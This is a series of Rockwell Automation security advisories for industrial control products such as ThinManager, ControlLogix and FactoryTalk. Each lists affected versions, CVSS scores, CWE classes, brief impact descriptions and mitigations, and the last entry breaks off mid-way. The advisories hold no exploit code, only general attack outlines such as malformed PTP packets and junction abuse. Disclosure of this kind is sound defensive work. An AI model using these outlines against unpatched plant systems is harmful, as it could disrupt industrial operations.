CVSS Scores (v3.1): 5.5, 7.8, 9.8
CVSS Scores (v4.0): 6.8, 8.5, 9.3
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 8/22/24
Last updated: 8/22/24
Revision Number: 1.0
CVSS Score: v3.1: 5.5, 7.8, 9.8; v4.0: 6.8, 8.5, 9.3

AFFECTED PRODUCTS AND SOLUTION

Affected Product           First Known in software version   Corrected in software version
ThinManager® ThinServer™   11.1.0-11.1.7                     11.1.8
ThinManager® ThinServer™   11.2.0-11.2.8                     11.2.9
ThinManager® ThinServer™   12.0.0-12.0.6                     12.0.7
ThinManager® ThinServer™   12.1.0-12.1.7                     12.1.8
ThinManager® ThinServer™   13.0.0-13.0.4                     13.0.5
ThinManager® ThinServer™   13.1.0-13.1.2                     13.1.3
ThinManager® ThinServer™   13.2.0-13.2.1                     13.2.2

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Nicholas Zubrisky of Trend Micro Security Research.

CVE-2024-7986 IMPACT

A vulnerability exists in the affected products that allows a threat actor to disclose sensitive information. A threat actor can exploit this vulnerability by abusing the ThinServer™ service to read arbitrary files by creating a junction that points to the target directory.

CVSS Base Score v3.1: 5.5/10
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVSS Base Score v4.0: 6.8/10
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE: CWE-269 Improper Privilege Management
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.


CVE-2024-7987 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. To exploit this vulnerability, a threat actor must abuse the ThinServer™ service by creating a junction and using it to upload arbitrary files.

CVSS Base Score v3.1: 7.8/10
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.5/10
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource


CVE-2024-7988 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. This vulnerability exists due to the lack of proper data input validation, which allows files to be overwritten.

CVSS Base Score v3.1: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 9.3/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

Mitigations and Workarounds

Customers using the affected software are encouraged to implement our suggested security best practices to minimize the risk of vulnerability.

  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-7986

  • JSON CVE-2024-7987

  • JSON CVE-2024-7988

High
SD1689 | AADvance® Standalone OPC-DA Server Code Execution Vulnerability via Vulnerable Component
Published Date: August 13, 2024
Last Updated: November 19, 2024
CVE IDs: CVE-2018-1285, CVE-2006-0743
CVSS Scores (v3.1): 7.5, 5.3
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: August 13, 2024 
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: Please see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product                     First Known in Software Version   Corrected in Software Version
AADvance® Standalone OPC-DA Server   v2.01.510                         v2.02 and later

VULNERABILITY DETAILS

CVE IMPACT

An arbitrary code execution vulnerability exists in the affected product. The vulnerability occurs due to a vulnerable component, Log4Net v1.2, which has multiple vulnerabilities listed below:

  • CVE-2018-1285, CVSS score 7.5 - log4net config file does not disable XML external entities
    • CVSS Base Score: 7.5
    • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 
    • CWE-20:  Improper Input Validation 
    • Known Exploited Vulnerability (KEV) database: None
  • CVE-2006-0743, CVSS score 5.3 - format string vulnerability in log4net
    • CVSS Base Score: 5.3 
    • CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 
    • CWE-134:  Use of Externally Controlled Format String
    • Known Exploited Vulnerability (KEV) database: None

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

  • JSON CVE-2006-0743

  • JSON CVE-2018-1285

High
SD1687 | Authentication Bypass Vulnerability in DataMosaix™
Published Date: August 13, 2024
Last Updated: November 20, 2024
CVE IDs: CVE-2024-6078
CVSS Scores (v3.1): 9.1
CVSS Scores (v4.0): 8.6
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Published Date: 8/13/2024
Updated Date: 8/13/2024
Revision Number: 1.0
CVSS Score: v3.1: 9.1, v4.0: 8.6

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product            First Known in Software Version   Corrected in Software Version
DataMosaix™ Private Cloud   V7.07 <                           v7.09 or later

Mitigations and Workarounds

  • Customers using the affected software are encouraged to upgrade the DataMosaix™ Private Cloud software from V7.07 to V7.09. The application support team will work with respective customers to upgrade. 

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAIL

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6078 IMPACT

An improper authentication vulnerability exists in the affected product, which could allow a malicious user to generate cookies for any user ID without the use of a username or password. If exploited, a malicious user could take over the account of a legitimate user. The malicious user would be able to view and modify data stored in the cloud. 

CVSS 3.1 Base Score: 9.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 8.6
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
CWE-287: Improper Authentication
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

  • JSON CVE-2024-6078

High
SD1686 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Controller Denial-of-Service Vulnerability via Input Validation
Published Date: August 13, 2024
Last Updated: November 19, 2024
CVE IDs: CVE-2024-7515
CVSS Scores (v3.1): 8.6
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

Published Date: August 13, 2024 
Last updated: September 13, 2024

Revision Number: 2.0

September 13, 2024 - Updated Affected Product and Solutions Table

CVSS Score: v3.1 8.6/10, v4.0 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product               First Known in firmware revision   Corrected in firmware revision
CompactLogix 5380              v28.011                            v34.014, v35.013, v36.011 and later
ControlLogix 5580              v28.011                            v34.014, v35.013, v36.011 and later
GuardLogix 5580                v31.011                            v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL2   v31.011                            v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL3   V32.013                            v34.014, v35.013, v36.011 and later
CompactLogix 5480              V32.011                            v34.014, v35.013, v36.011 and later

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the following risk mitigations, if possible:

  • If PTP messages are not used, block UDP ports 319/320 at the network level.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7515 IMPACT

A denial-of-service vulnerability exists in the affected products. A malformed PTP management packet can cause a major nonrecoverable fault in the controller.

CVSS 3.1 Base Score: 8.6
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20:  Improper Input Validation

Known Exploited Vulnerability (KEV) database: None

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

  • JSON CVE-2024-7515

High
SD1688 | FactoryTalk® View Site Edition Code Execution Vulnerability via File Permissions
Published Date: August 13, 2024
Last Updated: November 19, 2024
CVE IDs: CVE-2024-7513
CVSS Scores (v3.1): 8.8
CVSS Scores (v4.0): 8.5
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: Yes

Published Date: 8/13/2024 
Last Updated: 8/27/2024 
Revision Number: 2
CVSS Score: v3.1: 8.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product       First Known in Software Version   Corrected in Software Version
FactoryTalk® View SE   13.0                              N/A

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply security best practices, if possible.

  • By default, all HMI server projects are saved in the HMI projects folder on the HMI server computer located at C:\Users\Public\Documents\RSView Enterprise\SE\HMI projects. To enhance security and prevent unauthorized modifications to these projects, you can tighten the Windows folder's security settings on the HMI server computer by following these steps:
    • Remove the INTERACTIVE group from the folder’s security properties.
    • Add specific users or user groups and assign their permissions to this folder as needed.
    • If you assign read-only permission to those users or user groups, they can only view and will not be able to write to project files. Users with read-only permission can still test run and run the FactoryTalk® View SE client.
  • In Version 14: Open FactoryTalk® View Studio -> Help -> FactoryTalk® View SE Help -> In the Help file -> Security -> “HMI projects folder”

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7513 IMPACT

A code execution vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing any user to edit or replace files, which are executed by an account with elevated permissions.

CVSS 3.1 Base Score: 8.8 
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource 
Known Exploited Vulnerability (KEV) database: No

ADDITIONAL RESOURCES

  • JSON CVE-2024-7513

High
SD1690 | GuardLogix/ControlLogix 5580 Controller denial-of-service Vulnerability via Malformed Packet Handling
Published Date: August 13, 2024
Last Updated: September 13, 2024
CVE IDs: CVE-2024-40619
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: August 13, 2024 
Last updated: September 13, 2024

Revision Number: 2.0

September 13th, 2024 – Updated “Corrected in Firmware Versions”

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product     First Known in Firmware Version   Corrected in Firmware Version
ControlLogix® 5580   v34.011                           v34.014, v35.011 and later
GuardLogix 5580      v34.011                           v34.014, v35.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.  

CVE-2024-40619 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5 
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N 

CWE-754: Improper Check for Unusual or Exceptional Conditions

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities. 

High
SD1691 | Pavilion8® Unencrypted Data Vulnerability via HTTP protocol
Published Date: August 13, 2024
Last Updated: November 13, 2024
CVE IDs: CVE-2024-40620
CVSS Scores (v3.1): 7.4
CVSS Scores (v4.0): 5.3
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: August 13, 2024 
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, v4.0: 5.3/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Revision
Pavilion8® | v5.20 | v6.0

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • Interactions between the Console and Dashboard take place on the same machine; that machine should sit behind a firewall, and physical access to it should be limited to authorized personnel.

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities. 

CVE-2024-40620 IMPACT

A vulnerability exists in the affected product due to lack of encryption of sensitive information. The vulnerability results in data being sent between the Console and the Dashboard without encryption, which can be seen in the logs of proxy servers, potentially impacting the data's confidentiality.

CVSS 3.1 Base Score: 7.4/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CVSS 4.0 Base Score: 5.3/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

CWE-311: Missing Encryption of Sensitive Data

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

  • JSON CVE-2024-40620

Medium
SD1684 | Micro850/870 Vulnerable to denial-of-service Vulnerability via CIP/Modbus Port
Published Date: August 12, 2024
Last Updated: October 16, 2024
CVE IDs: CVE-2024-7567
CVSS Scores (v3.1): 5.3
CVSS Scores (v4.0): 6.9
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Micro850/870 Vulnerable to denial-of-service Vulnerability via CIP/Modbus Port

Published Date: 8/13/24

Last Updated: 8/13/2024

Revision Number: 1.0

CVSS Score: v3.1: 5.3/10, v4.0: 6.9/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments. 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
PLC - Micro850/870 (2080-L50E/2080-L70E) | v20.011 | v22.011

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7567 IMPACT

A denial-of-service vulnerability exists via the CIP/Modbus port in the affected products. If exploited, CIP/Modbus communication may be disrupted for a short duration.

CVSS 3.1 Base Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS 4.0 Base Score: 6.9
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE: CWE-400: Uncontrolled Resource Consumption

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply security best practices, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2024-7567

Medium
SD1683 | DLL Hijacking Vulnerability Exists in Emulate3D™
Published Date: August 12, 2024
Last Updated: November 19, 2024
CVE IDs: CVE-2024-6079
CVSS Scores (v3.1): 6.7
CVSS Scores (v4.0): 5.4
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Published Date: 8/13/2024

Updated Date: 8/13/2024

Revision Number: 1.0

CVSS: v3.1: 6.7, v4.0: 5.4

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
Emulate3D™ | 17.00.00.13276 | 17.00.00.13348

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6079 IMPACT

A vulnerability exists in the affected product, which could be leveraged to execute a DLL Hijacking attack. The application loads shared libraries, which are readable and writable by any user. If exploited, a malicious user could leverage a malicious dll and perform a remote code execution attack.

CVSS 3.1 Base Score: 6.7
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 5.4
CVSS Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-610: Externally Controlled Reference to a Resource in Another Sphere

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the following risk mitigations, if possible:

  • Update to the corrected software version, 17.00.00.13348.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

  • JSON CVE-2024-6079

High
SD1682 | Chassis Restrictions Bypass Vulnerability in Select Logix Devices
Published Date: July 31, 2024
Last Updated: October 16, 2024
CVE IDs: CVE-2024-6242
CVSS Scores (v3.1): 8.4
CVSS Scores (v4.0): 7.3
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

Published Date: August 1, 2024

Last updated: August 29th, 2024

Revision Number: 2.0

August 29, 2024 - Updated Affected Products and Solution Chart for 1756-EN2T, 1756-EN2F, 1756-EN2TR, 1756-EN3TR

CVSS Score: v3.1: 8.4/10, v4.0: 8.5/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ControlLogix® 5580 (1756-L8z) | V28 | V32.016, V33.015, V34.014, V35.011 and later
GuardLogix® 5580 (1756-L8zS) | V31 | V32.016, V33.015, V34.014, V35.011 and later
1756-EN4TR | V2 | V5.001 and later
1756-EN2T, Series A/B/C | v5.007 (unsigned)/v5.027 (signed) | No fix for Series A/B/C. Upgrade to Series D.
1756-EN2F, Series A/B | v5.007 (unsigned)/v5.027 (signed) | No fix for Series A/B. Upgrade to Series C.
1756-EN2TR, Series A/B | v5.007 (unsigned)/v5.027 (signed) | No fix for Series A/B. Upgrade to Series C.
1756-EN3TR, Series A | v5.007 (unsigned)/v5.027 (signed) | No fix for Series A. Upgrade to Series B.
1756-EN2T, Series D | V10.006 | V12.001 and later
1756-EN2F, Series C | V10.009 | V12.001 and later
1756-EN2TR, Series C | V10.007 | V12.001 and later
1756-EN3TR, Series B | V10.007 | V12.001 and later
1756-EN2TP, Series A | V10.020 | V12.001 and later

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. Claroty reported the following vulnerability. 

CVE-2024-6242 IMPACT                                                                                                                                       

A vulnerability exists in the affected products that allows a threat actor to bypass the Trusted® Slot feature in a ControlLogix® controller. If exploited on any affected module in a 1756 chassis, a threat actor could potentially execute CIP commands that modify user projects and/or device configuration on a Logix controller in the chassis.  

CVSS Base Score v3.1: 8.4/10
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:H

CVSS Base Score v4.0: 7.3/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H

CWE-420: Unprotected Alternate Channel

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds 

Users using the affected firmware and who are not able to upgrade to one of the corrected versions are encouraged to apply the following mitigation and security best practices, where possible. 

  • Limit the allowed CIP commands on controllers by setting the mode switch to the RUN position.

  • Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

  • JSON CVE-2024-6242

  • System Security Design Guidelines

High
SD1681 | Privilege Escalation Vulnerability in Pavilion8®
Published Date: July 16, 2024
Last Updated: November 20, 2024
CVE IDs: CVE-2024-6435
CVSS Scores (v3.1): 8.8
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: July 16, 2024 
Last updated: July 16, 2024

Revision Number: 1.0

CVSS Score: v3.1: 8.8/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version(s) | Corrected in Software Revision
Pavilion8® | v5.15.00, v5.15.01, v5.16.00, v5.17.00, v5.17.01, v5.20.00 | v6.0
 

Mitigations and Workarounds 

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.  

  • Limit access to only users who need it. 

  • Periodically review user access and privileges to confirm accuracy. 

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.  

CVE-2024-6435 IMPACT

A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should only be available to users with administrative level privileges. If exploited, an attacker could read sensitive data, and create users. For example, a malicious user with basic privileges could perform critical functions such as creating a user with elevated privileges and reading sensitive information in the “views” section.  

CVSS 3.1 Base Score: 8.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-732: Incorrect Permission Assignment for Critical Resource

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-6435

High
SD1680 | Major nonrecoverable fault in 5015 – AENFTXT
Published Date: July 10, 2024
Last Updated: November 20, 2024
CVE IDs: CVE-2024-6089
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Major nonrecoverable fault in 5015 – AENFTXT

Published Date: 7/16/2024

Updated Date: 7/16/2024

Revision Number: 1.0

CVSS: v3.1: 7.5, v4.0: 8.7

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
5015 - AENFTXT | v2.011 | v2.012
 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6089 IMPACT

An input validation vulnerability exists in the affected products: when a manipulated PTP packet is sent, the secondary adapter enters a major nonrecoverable fault. If exploited, a power cycle is required to recover the product.

CVSS 3.1 Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Update to the corrected firmware revision, v2.012.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

  • JSON CVE-2024-6089

High
SD1679 | Input Validation Vulnerability exists in the SequenceManager™ Server
Published Date: July 10, 2024
Last Updated: September 27, 2024
CVE IDs: CVE-2024-6436
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: July 16, 2024

Last updated: October 1, 2024

Revision Number: 2.0

October 1, 2024 - Updated CVE Number.

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
SequenceManager™ | <v2.0 | v2.0 or later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6436 IMPACT

An input validation vulnerability exists in the affected products which could allow a malicious user to send malformed packets to the server and cause a denial-of-service condition. If exploited, the device would become unresponsive, and a manual restart will be required for recovery. Additionally, if exploited, there could be a loss of view for the downstream equipment sequences in the controller. Users would not be able to view the status or command the equipment sequences, however the equipment sequence would continue to execute uninterrupted.

CVSS 3.1 Base Score: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N 

CWE: CWE-428: Unquoted Search Path or Element

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

  • JSON CVE-2024-6436

Medium
SD1678 | Unsecured Private Keys in FactoryTalk® System Services
Published Date: July 02, 2024
Last Updated: December 01, 2024
CVE IDs: CVE-2024-6325, CVE-2024-6236
CVSS Scores (v3.1): 6.5, 5.9
CVSS Scores (v4.0): 6.0, 1.8
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: July 11, 2024

Last updated: July 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 6.5/10, 5.9/10 ; v4.0: 6.0/10, 1.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version | Corrected Version
FactoryTalk® System Services (installed via FTPM) | v6.40 | V6.40.01
FactoryTalk® Policy Manager (FTPM) | v6.40 | V6.40.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6325 IMPACT

